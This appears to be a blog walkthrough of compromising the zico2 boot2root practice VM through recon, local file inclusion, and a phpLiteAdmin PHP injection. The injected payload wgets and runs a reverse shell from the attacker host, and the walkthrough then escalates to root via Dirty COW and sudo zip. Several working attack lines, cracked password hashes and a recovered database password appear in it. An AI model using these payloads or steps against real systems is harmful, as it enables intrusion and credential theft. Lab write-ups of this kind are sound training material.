Rooting zico2 Walkthrough

Overview

zico2 is boot2root virtual machine designed for students to practice vulnerability analysis and exploitation. Objective is to root this virtual machine by exploiting possible vulnerabilities leading to full system compromise.

Lab Setup:

  • VMWare workstation for Virtual Machines
  • Kali Linux VM in Bridge mode
  • zico2 in Bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap
  • gcc
  • pentestermonkey reverse shell.

Vulnerabilities Exploited:

  • Default password
  • Local file inclusion and phpliteadmin RCE
  • Passwords misconfiguration
  • Linux Kernel 2.6.22 < 3.9 – ‘Dirty COW’ ‘PTRACE_POKEDATA’ Race Condition Privilege Escalation (/etc/passwd Method)
  • sudo misconfiguration

Reconnaissance

#netdiscover

Target VM IP Address: 192.168.8.104

Scanning

nmap

nmap -p- -A 192.168.8.104

Nmap findings:

  • Target box is linux machine
  • Secure shell on port 22
  • web server on port 80

Exploit path 1 for shell: LFI, phpliteadmin RCE

Lets explore website in browser

Found LFI

Other than LFI, nothing fancy. Lets explore website with dirbuster

I found dbadmin directory with dirbuster.

http://192.168.8.105/dbadmin/ is “phpLiteAdmin v1.9.3”

Googled “phpLiteAdmin v1.9.3” vulnerabilities, and found default password “admin” along with other vulnerabilities.

Logged into “phpLiteAdmin” with “admin” password.

“phpLiteAdmin v1.9.3” is vulnerable to other vulnerabilities that we will exploit.

Before that, lets check if we can crack test users password hashes and reuse that password for secure shell.

md5 hash cracked online

root:653F4B285089453FE00E2AAFAC573414:34kroot34

zico:96781A607F4E9F5F423AC01F0DAB0EBD:zico2215@

these username:passwords are not reusable over ssh.

Next target is phpliteadmin v1.9.3 vulnerabilities. Lets google!

Lets exploit php remote code execution in phpliteadmin.

Before exploiting sql injection over server, lets host reverse-shell.php on attacking machine:192.168.8.105

http://192.158.8.105/shell.txt

and also start nc reverse connection handler on attacking machine.

nc -nvlp 1234

configuration on attacking machine is complete.

Now, attacking target box, i created database sahi, and renamed to sahi.php.

Then created a table with text column, and set default value to our code as:

<?php system(“wget 192.168.8.105/shell.txt -O /usr/databases/shell4.php; php /usr/databases/shell4.php”); ?>

access database file from browser

http://192.168.8.104/view.php?page=../../../../../../../../usr/databases/sahi.php

we received reverse shell connection

lets break shell jail

python -c “import pty; pty.spawn(‘/bin/bash’);”

exploring /home/zico/wordpres/wp-config.php we found database connection settings as

username:zico

password:sWfCsfJSPV9H3AmQzw8

Lets login to secure shell with this username and password.

Privilege Escalation 1: Linux Kernel 2.6.22 < 3.9 – ‘Dirty COW’ ‘PTRACE_POKEDATA’ Race Condition Privilege

Lets compile and root using this exploit https://www.exploit-db.com/exploits/40839/

Congrats! we are root.

Privilege Escalation 2: System misconfiguration.

zip utility is given sudo privileges. zip utility can execute system commands. Since, utitlity is provided with sudo privileges, every command is executed as root when zip utility is invoked with sudo. So lets invoke shell!!!

Congrats, we are 2nd time root!!!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s